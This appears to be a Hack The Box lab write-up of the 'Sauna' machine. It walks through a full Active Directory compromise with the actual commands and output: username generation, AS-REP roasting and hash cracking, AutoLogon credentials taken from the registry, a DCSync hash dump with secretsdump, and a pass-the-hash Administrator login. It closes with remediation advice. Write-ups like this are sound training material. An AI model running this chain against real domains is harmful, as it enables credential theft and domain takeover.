ββββββββ ββββββ βββ βββββββ βββ ββββββ
βββββββββββββββββββ ββββββββ βββββββββββ
βββββββββββββββββββ βββββββββ βββββββββββ
βββββββββββββββββββ βββββββββββββββββββββ
βββββββββββ βββββββββββββββ βββββββββ βββ
βββββββββββ βββ βββββββ βββ ββββββββ βββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ βββ ββββββ βββββββββ βββ βββ ββββββββ βββββββ βββ ββββββ ββ
ββ ββββββ ββββ ββ β βββ ββββββββββ ββββ β ββββ ββββββββββ β βββ ββ
ββ βββ βββ βββ β β ββββ ββββββ βββ βββββββ βββ βββββββββ βββ β ββ
ββ βββββββββ ββββ βββββ ββββ β ββββ βββ ββββββ β ββββ ββββββββββββ ββ
ββ ββ βββββ βββββ β ββββ β ββββ ββββ βββββββ βββββββ ββββββββ ββββ ββ
ββ ββ βββββ ββ β β β ββ ββ β ββ ββ ββ β βββ β ββ β ββ ββββ ββ
ββ β ββ β β β β β β β ββ β β β β β β β β ββ β ββ ββ
ββ β β β β β β ββ β β β β β β ββ β ββ
ββ β ββ β β β β β β β β ββ
ββ β β β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β E X P L O I T A T I O N // A C T I V E D I R E C T O R Y β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ATTACK VECTORS β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β [+] Website OSINT - Employee Name Enumeration β
β [+] Username Generation via username-anarchy β
β [+] AS-REP Roasting (Kerberos Pre-Auth Disabled) β
β [+] Hash Cracking with Hashcat β
β [+] AutoLogon Credentials Discovery via WinPEAS β
β [+] DCSync Attack (Replication Privilege Abuse) β
β [+] Pass-the-Hash for Administrator Access β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ WEB ENUMERATION
- >_ FOOTHOLD // AS-REP ROASTING
- >_ PRIVILEGE ESCALATION
- >_ BLOODHOUND ANALYSIS
- >_ DCSYNC ATTACK
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
- >_ LESSONS LEARNED
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β T A R G E T I N F I L T R A T I O N P A R A M E T E R S β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β IP ADDRESS........: 10.10.10.175 β
β HOSTNAME..........: SAUNA.EGOTISTICAL-BANK.LOCAL β
β DOMAIN............: EGOTISTICAL-BANK.LOCAL β
β OPERATING SYSTEM..: Windows Server 2019 (Active Directory DC) β
β DIFFICULTY........: Easy β
β ATTACK SURFACE....: Active Directory Domain Controller β
β KEY SERVICES......: Kerberos, LDAP, SMB, WinRM, HTTP β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Add target to /etc/hosts using NetExec:
sudo nxc smb $RHOST --generate-hosts-file /etc/hostsThis automatically adds the domain and hostname to your hosts file for proper name resolution.
rustscan -a $RHOST --ulimit 5000 -r 1-65535 -- -A -Pn -oA Sauna_fullScanOpen 10.10.10.175:53
Open 10.10.10.175:80
Open 10.10.10.175:88
Open 10.10.10.175:135
Open 10.10.10.175:139
Open 10.10.10.175:389
Open 10.10.10.175:445
Open 10.10.10.175:464
Open 10.10.10.175:593
Open 10.10.10.175:3268
Open 10.10.10.175:5985
Open 10.10.10.175:9389
{SNIP - High ports 49667-49696}
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 53 | DNS | Domain DNS resolution |
| 80 | HTTP | Microsoft IIS 10.0 - Bank Website (OSINT Target) |
| 88 | Kerberos | Authentication service - AS-REP Roasting target |
| 135 | MSRPC | Microsoft Windows RPC |
| 139 | NetBIOS | Microsoft Windows netbios-ssn |
| 389 | LDAP | Microsoft Windows AD LDAP |
| 445 | SMB | Windows Server 2019 Standard |
| 464 | Kpasswd5 | Kerberos password change |
| 593 | MSRPC | HTTP RPC Endpoint Mapper |
| 3268 | LDAP | Global Catalog |
| 5985 | WinRM | Remote PowerShell - shell access with valid creds |
| 9389 | .NET Message | AD Web Services |
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β KEY FINDINGS β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β [+] Port 88 (Kerberos) - Target for AS-REP Roasting β
β [+] Port 5985 (WinRM) - Remote shell access once creds obtained β
β [+] Port 80 (HTTP) - Employee names for username generation β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Browsing to port 80 reveals Egotistical Bank corporate website. The "Meet The Team" page exposed employee names:
ββ EMPLOYEES DISCOVERED ββββββββββββββββββββββββββββββββββββββββββββββ
β Fergus Smith β
β Shaun Coins β
β Hugo Bear β
β Bowie Taylor β
β Sophie Driver β
β Steven Kerb β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Created target user list:
cat ~/users.txt
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven KerbUsed username-anarchy to generate AD username permutations:
./username-anarchy --input-file ~/users.txt > test_users.txtcat test_users.txt
fergus
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
{SNIP}ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VULNERABILITY IDENTIFIED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β TYPE......: Kerberos Pre-Authentication Disabled β
β TECHNIQUE.: AS-REP Roasting (T1558.004) β
β IMPACT....: Offline password cracking without authentication β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
GetNPUsers.py -no-pass -usersfile test_users.txt -dc-ip $RHOST EGOTISTICAL-BANK.local/[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
{SNIP - Multiple failures}
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a978c311c5bcae8b594f0ea98936089d$aff370c2a23ea559a93f754076ce67d6cd6a5dcb934af1053bba559b89765e61839e9e634b674a59f67c9079951c8adf4eba1b9e1111a2812b26b237db45d1656b2bfc593c834bbe3241b031234fc61a42d5adfa1731eb3eb3da8b17bb49633e9360221934db43bd2860b9fb01c14b33eda691de528a6e61e93444370aad98c4c99aa9994e641716492ffa1345d282f9da0363329cbd7d94b6a0abf6f59f60fce2d0c75181ce0091b7baa4f6f320cddd2efc026ade0f7864dc7cf860140aca58b9553bc4d222b6c7275a1092102f3be6b77c89fd63d5032e28f4619982e12f17071933e544030f242b48c725799f50236f2d505f1a701cbb4e695ee82c341303
{SNIP - More failures}
Got hash for fsmith
cat << EOF > hash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:a978c311c5bcae8b594f0ea98936089d$aff370c2a23ea559a93f754076ce67d6cd6a5dcb934af1053bba559b89765e61839e9e634b674a59f67c9079951c8adf4eba1b9e1111a2812b26b237db45d1656b2bfc593c834bbe3241b031234fc61a42d5adfa1731eb3eb3da8b17bb49633e9360221934db43bd2860b9fb01c14b33eda691de528a6e61e93444370aad98c4c99aa9994e641716492ffa1345d282f9da0363329cbd7d94b6a0abf6f59f60fce2d0c75181ce0091b7baa4f6f320cddd2efc026ade0f7864dc7cf860140aca58b9553bc4d222b6c7275a1092102f3be6b77c89fd63d5032e28f4619982e12f17071933e544030f242b48c725799f50236f2d505f1a701cbb4e695ee82c341303
EOFhashcat -m 18200 hash.txt --wordlist rockyou.txt$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Time.Started.....: Sun Jan 11 11:44:37 2026 (1 sec)
Time.Estimated...: Sun Jan 11 11:44:38 2026 (0 secs)
{SNIP}
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CREDENTIAL OBTAINED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β USERNAME: fsmith β
β PASSWORD: Thestrokes23 β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
evil-winrm -i $RHOST -u 'fsmith' -p 'Thestrokes23'*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
HTB{********_REDACTED_********}bloodhound-ce-python -c all -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -ns $RHOST --zipINFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 7 users
INFO: Found 52 groups
{SNIP}
INFO: Compressing output into 20260111114613_bloodhound.zip
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload WinPEAS_64.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\WinPEAS_64.exeββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β AUTOLOGON CREDENTIALS DISCOVERED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β Looking for AutoLogon credentials β
β Some AutoLogon credentials were found β
β DefaultDomainName : EGOTISTICALBANK β
β DefaultUserName : EGOTISTICALBANK\svc_loanmanager β
β DefaultPassword : Moneymakestheworldgoround! β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β CREDENTIAL OBTAINED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β USERNAME: svc_loanmgr β
β PASSWORD: Moneymakestheworldgoround! β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
BloodHound reveals svc_loanmgr has DCSync privileges (DS-Replication-Get-Changes):
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ATTACK PATH IDENTIFIED β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β svc_loanmgr@EGOTISTICAL-BANK.LOCAL β
β β β
β βββ[DCSync Rights]ββ> EGOTISTICAL-BANK.LOCAL (Domain) β
β β β
β βββ> Full Credential Dump β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VULNERABILITY IDENTIFIED β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β TYPE......: Excessive DCSync Privileges β
β TECHNIQUE.: DCSync (T1003.006) β
β IMPACT....: Complete domain credential compromise β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
secretsdump.py 'EGOTISTICAL-BANK'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:ac100d89f65b041c0474cb0238fbdd16:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
{SNIP - Additional Kerberos keys}
[*] Cleaning up...
evil-winrm -i 10.10.10.175 -u 'Administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
HTB{********_REDACTED_********}βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββββββ ββββββββββββββββββββββββββββββββ ββββ β
β ββββββββββββ ββββββββββββββββββββββββββββββββββ βββββ β
β ββββββββ βββββββ ββββββββ βββ ββββββ βββββββββββ β
β ββββββββ βββββ ββββββββ βββ ββββββ βββββββββββ β
β ββββββββ βββ ββββββββ βββ βββββββββββ βββ βββ β
β ββββββββ βββ ββββββββ βββ βββββββββββ βββ β
β β
β C:\Windows\system32> whoami β
β egotisticalbank\administrator β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββ ββββββββββββββββββββββββββ βββββββββββ ββββββ βββββββ β
β βββ βββββββββββββββββββββββββββ βββββββββββ ββββββββββββββββ β
β βββ βββββββββββββββββ ββββββββ ββββββ βββ βββββββββββ ββββ β
β βββ βββββββββββββββββ ββββββββ ββββββ βββ βββββββββββ βββ β
β ββββββββββββββββββββββββββββ βββ βββ βββββββββββ ββββββββββββ β
β βββββββ βββββββββββββββββββ βββ βββ βββββββββββ βββ βββββββ β
β β
β LOCATION: C:\Users\FSmith\Desktop\user.txt β
β FLAG: HTB{********_REDACTED_********} β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β βββββββ βββββββ βββββββ βββββββββ βββββββββββ ββββββ βββββββ β
β βββββββββββββββββββββββββββββββββββ βββββββββββ ββββββββββββββββ β
β βββββββββββ ββββββ βββ βββ ββββββ βββ βββββββββββ ββββ β
β βββββββββββ ββββββ βββ βββ ββββββ βββ βββββββββββ βββ β
β βββ βββββββββββββββββββββ βββ βββ βββββββββββ ββββββββββββ β
β βββ βββ βββββββ βββββββ βββ βββ βββββββββββ βββ βββββββ β
β β
β LOCATION: C:\Users\Administrator\Desktop\root.txt β
β FLAG: HTB{********_REDACTED_********} β
β β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β EXFILTRATED CREDENTIALS β
β βββββββββββββ¦βββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββ¦ββββββββββββββββββββββββββββββββ£
β TYPE β USERNAME β PASSWORD / HASH β SOURCE β
β βββββββββββββ¬βββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββ¬ββββββββββββββββββββββββββββββββ£
β Cleartext β fsmith β Thestrokes23 β AS-REP Roast + Hashcat β
β Cleartext β svc_loanmgr β Moneymakestheworldgoround! β AutoLogon Registry β
β NT Hash β Administrator β 823452073d75b9d1cf70ebdf86c7f98e β DCSync β
β NT Hash β HSmith β 58a52d36c84fb7f5f1beab9a201db1dd β DCSync β
β NT Hash β FSmith β 58a52d36c84fb7f5f1beab9a201db1dd β DCSync β
β NT Hash β krbtgt β 4a8899428cad97676ff802229e466e2c β DCSync β
β NT Hash β svc_loanmgr β 9cb31797c39a9b170b04058ba2bba48c β DCSync β
ββββββββββββββ©βββββββββββββββββββ©βββββββββββββββββββββββββββββββββββββββββββββ©ββββββββββββββββββββββββββββββββ
| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning | Rustscan/Nmap |
| Reconnaissance | T1589.003 | Gather Employee Names | Website OSINT |
| Credential Access | T1558.004 | AS-REP Roasting | GetNPUsers.py |
| Credential Access | T1110.002 | Password Cracking | Hashcat |
| Initial Access | T1078 | Valid Accounts | fsmith via WinRM |
| Discovery | T1552.002 | Credentials in Registry | WinPEAS AutoLogon |
| Credential Access | T1003.006 | DCSync | secretsdump.py |
| Lateral Movement | T1550.002 | Pass-the-Hash | Evil-WinRM |
| Tool | Purpose |
|---|---|
| nxc (NetExec) | SMB enum & hosts file generation |
| rustscan | Fast port scanning |
| nmap | Service enumeration |
| username-anarchy | AD username generation |
| GetNPUsers.py | AS-REP Roasting |
| hashcat | Hash cracking (mode 18200) |
| bloodhound-ce-python | AD data collection |
| BloodHound CE | Attack path visualization |
| WinPEAS | Windows privesc enumeration |
| secretsdump.py | DCSync attack |
| Evil-WinRM | WinRM shell access |
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β KEY TAKEAWAYS β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β [1] Website OSINT is valuable β
β - Employee names from corporate websites can lead to valid AD usernames β
β β
β [2] AS-REP Roasting β
β - Always check for accounts with Kerberos pre-authentication disabled β
β - Tools like username-anarchy help generate valid username formats β
β β
β [3] AutoLogon = Free Credentials β
β - Windows AutoLogon stores passwords in registry (plaintext!) β
β - WinPEAS and other tools can extract these automatically β
β β
β [4] Service Accounts are Dangerous β
β - Often have excessive privileges like DCSync rights β
β - Monitor and audit service account permissions regularly β
β β
β [5] DCSync = Game Over β
β - Once you have replication rights, you own the domain β
β - Only Domain Controllers should have these permissions β
β β
β [6] Password Reuse β
β - HSmith & FSmith share the same password hash β
β - Enforce unique passwords and implement password policies β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β BLOCKERS ENCOUNTERED β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β Problem: Hashcat autodetect mode caused segmentation fault β
β Solution: Explicitly specify hash mode with `-m 18200` β
β β
β Problem: GetNPUsers.py syntax confusion β
β Solution: Correct syntax: GetNPUsers.py -no-pass -usersfile FILE -dc-ip IP DOMAIN/ β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β REMEDIATION β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β [1] AS-REP Roasting Vulnerability β
β - Issue: fsmith has "Do not require Kerberos preauthentication" enabled β
β - Fix: Disable this setting for all accounts, enforce strong passwords β
β β
β [2] AutoLogon Credentials β
β - Issue: svc_loanmgr password stored in registry plaintext β
β - Fix: Remove AutoLogon, use Group Managed Service Accounts (gMSA) β
β β
β [3] Excessive DCSync Permissions β
β - Issue: Service account has DS-Replication-Get-Changes privileges β
β - Fix: Remove replication rights from non-DC accounts immediately β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Techniques:
Tools:
Similar HTB Boxes:
- HTB Forest (AS-REP Roasting)
- HTB Active (Kerberoasting)
- HTB Resolute (AD Enumeration)
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β HOW TO FIND EXPLOITS & POC SCRIPTS β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β [1] IDENTIFY VERSION β
β βΈ Use nmap, nxc to fingerprint OS and services β
β βΈ Check LDAP/SMB banners for Windows version β
β βΈ Example: Windows Server 2019, Kerberos 5 β
β β
β [2] SEARCH EXPLOIT-DB / SEARCHSPLOIT β
β βΈ searchsploit windows server 2019 β
β βΈ searchsploit kerberos β
β βΈ searchsploit active directory β
β βΈ https://www.exploit-db.com/ β
β β
β [3] SEARCH CVE DATABASES β
β βΈ https://nvd.nist.gov/ (NIST National Vulnerability Database) β
β βΈ https://cve.mitre.org/ (CVE List) β
β βΈ https://msrc.microsoft.com/ (Microsoft Security Response Center) β
β β
β [4] GITHUB POC REPOSITORIES β
β βΈ https://github.com/fortra/impacket (Impacket - AD attacks) β
β βΈ https://github.com/GhostPack/Rubeus (Kerberos attacks) β
β βΈ https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator) β
β βΈ https://github.com/trickest/cve (CVE PoC collection) β
β β
β [5] ACTIVE DIRECTORY RESOURCES β
β βΈ https://book.hacktricks.xyz/windows-hardening/active-directory-methodology β
β βΈ https://adsecurity.org/ (AD Security Blog) β
β βΈ https://www.thehacker.recipes/ (AD Attack Recipes) β
β β
β [6] SECURITY RESEARCH RESOURCES β
β βΈ https://github.com/swisskyrepo/PayloadsAllTheThings β
β βΈ https://www.ired.team/ (Red Team Notes) β
β βΈ https://pentestlab.blog/ (Pentestlab Blog) β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β VULNERABILITIES IN THIS BOX - SEARCH QUERIES β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β AS-REP Roasting (T1558.004) β
β βΈ Tool: GetNPUsers.py (Impacket) β
β βΈ https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py β
β βΈ "AS-REP Roasting" kerberos pre-authentication β
β βΈ Hashcat mode: 18200 β
β β
β AutoLogon Credentials (T1552.002) β
β βΈ Tool: WinPEAS, reg query β
β βΈ "windows autologon password registry" β
β βΈ HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon β
β β
β DCSync Attack (T1003.006) β
β βΈ Tool: secretsdump.py (Impacket) β
β βΈ https://github.com/fortra/impacket/blob/master/examples/secretsdump.py β
β βΈ "DCSync attack" DS-Replication-Get-Changes β
β β
β Pass-the-Hash (T1550.002) β
β βΈ Tools: evil-winrm, psexec.py, wmiexec.py β
β βΈ "pass the hash" NTLM authentication β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β WRITEUP AUTHOR: Netrunner β
β COMPLETION DATE: 2026-01-11 β
β ATTACK CHAIN: OSINT > AS-REP Roast > AutoLogon > DCSync > Pass-the-Hash > SYSTEM β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
